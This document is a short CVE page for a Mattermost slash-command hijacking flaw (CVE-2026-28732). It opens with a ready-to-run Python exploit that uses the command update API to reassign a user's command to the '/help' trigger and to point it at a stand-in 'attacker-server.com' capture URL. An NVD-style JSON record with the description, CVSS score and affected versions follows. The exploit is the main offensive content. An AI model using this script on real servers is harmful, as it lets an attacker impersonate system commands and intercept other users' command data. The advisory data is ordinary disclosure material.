CVE-2026-28732

import requests import json # Target configuration TARGET_URL = "https://mattermost.example.com" API_TOKEN = "USER_ACCESS_TOKEN" COMMAND_ID = "YOUR_CUSTOM_COMMAND_ID" TARGET_TRIGGER = "/help" # Existing system command to hijack headers = { "Authorization": f"Bearer {API_TOKEN}", "Content-Type": "application/json" } # Payload to update the command trigger to match an existing one payload = { "trigger": TARGET_TRIGGER, "description": "Hijacked command description", "url": "http://attacker-server.com/capture", "method": "P" } # Send update request to the API response = requests.patch(f"{TARGET_URL}/api/v4/commands/{COMMAND_ID}", headers=headers, data=json.dumps(payload)) if response.status_code == 200: print(f"[+] Successfully hijacked trigger: {TARGET_TRIGGER}") else: print(f"[-] Failed to hijack trigger. Status Code: {response.status_code}") print(response.text)

{"cve": {"id": "CVE-2026-28732", "sourceIdentifier": "[email protected]", "published": "2026-05-18T09:16:22.570", "lastModified": "2026-05-19T17:18:19.690", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 Fail to enforce slash command trigger-word uniqueness during command updates which allows an authenticated team member with Manage Own Slash Commands permission to hijack and impersonate existing system or custom slash commands via editing their own slash command trigger to an already-registered trigger through the command update API. Mattermost Advisory ID: MMSA-2026-00597"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.14", "matchCriteriaId": "413D9405-79C3-4299-B0DC-40D9EE5CC717"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.4.0", "versionEndExcluding": "11.4.4", "matchCriteriaId": "CF171039-837A-4D23-87EB-F328AD04976C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.5.0", "versionEndExcluding": "11.5.2", "matchCriteriaId": "726AD6AD-6C01-45BB-9115-B8209717A6D4"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}